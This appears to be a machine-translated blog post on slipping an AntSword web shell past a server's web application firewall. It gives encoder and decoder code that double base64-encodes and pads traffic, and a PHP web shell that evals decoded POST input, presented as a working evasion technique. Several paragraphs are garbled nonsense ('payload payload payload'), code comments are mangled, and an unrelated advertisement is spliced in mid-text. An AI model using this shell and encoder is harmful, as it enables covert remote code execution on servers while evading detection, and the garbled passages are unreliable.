Small ideas for passing WAF

preface

Recently in the study of a wave of CMS vulnerabilities, to the authorization, see a few stations, pagoda WAF… After getting back from the WHOAMI, he bypassed a WAF. I think it’s time for a serious summary 🙂

Prophase process

The payload of the Payload payload is a payload that can be used as a payload. The payload is a payload that can be used as a payload. 🙂

Payload payload payload payload payload payload payload payload Not to mention the ant sword connection…

WAF filters some functions, so it cannot play payload directly. Therefore, we need to obfuscate the traffic characteristics of ant Sword

A normal shell would look like this:

< p style =” max-width: 100%; clear: both; min-height: 1em

For example

Let’s put phpInfo (); Base64 encrypted POST parameters, you can normally execute PHPInfo

But…

CMD Command Execution

But the ant-sword connected shell went viral…

You can also write phpinfo, but ant sword connection error, why??

In fact, we can learn about the flow of ant swords first

First look at the base64 encoder structure of ant Sword:

'use strict'; /* @param {String} PWD connection password @param {Array} data Payload Array before the encoder processes @return {Array} data Payload Array after the encoder processes */ module.exports = (pwd, data, Ext = {}) = > {/ / # # # # # # # # # # below, please write your own code # # # # # # # # # # # # # # # # # # # / / the following code for PHP Base64 sample / / generates a random variable name let randomID = `_0x${Math.random().toString(16).substr(2)}`; // Payload ['_'] Data [randomID] = buffer. from(data['_']).toString('base64'); Data [PWD] = 'eval($_POST[${randomID}]); `; / / # # # # # # # # # # in the above, please write your own code # # # # # # # # # # # # # # # # # # # / / delete _ original payload delete data (' _ '); // Return the payload array after the encoder processes it. }Copy the code

Explain:

PWD: Type String, this is the shell connection password

Data: The type is Array. This is the HTTP POST packet to be sent

Buffer.from(data[‘_’]).toString(‘base64’) reads and base64 encodes the code in data[‘_’], then the following data[PWD] is passed to the server as an argument and decoded to execute the shell code. Although the code in data[‘_’] is base64 encoded, data[PWD] is passed as a parameter, so data[PWD] in traffic is still transmitted in plaintext.

Moreover, the ant sword will add random characters of a certain length when encoding data, but the characteristic character Y21K will always be recognized no matter how long the CMD command adds character

So what to do??

2021 full set of network security information package and the latest interview questions (penetration tools, environment building, HTML, PHP, MySQL basic learning, information collection, SQL injection,XSS, CSRF, brute force cracking, etc.)

Decoder content:

*/
'use strict';

module.exports = (pwd, data) => {
  let ret = {};
  for (let _ in data) {
    if (_ === '_') { continue };
    ret[_] = Buffer.from(data[_]).toString('hex');
  }
  ret[pwd] = Buffer.from(data['_']).toString('hex');
  return ret;
}
Copy the code

Since ant sword will base64 encrypt data once by default, we can base64 encrypt data again and add data value 🙂

Like this:

let ret = {};
for (let _ in data)
{
if (_ === '_')
{ continue; }
ret[_] = Buffer.from(data[_]).toString('base64');
ret[_] = 'andynoel1234' + ret[_];
ret[_] += 'andynoel1234';
}
Copy the code

At the same time, the shell we wrote wasn’t that simple, so we had to modify it a little bit accordingly:

<? php foreach($_POST as $k=>$v){$_POST[$k]=base64_decode(str_replace('andynoel1234','',$v)); } @eval($_POST['hack']); ? >Copy the code

Capture the packet on the first POST and remove the additional data value we added, such as andyNoel1234 above

Then base64 decodes the rest of the content twice, tries the ant Sword connection successfully, and executes CMD.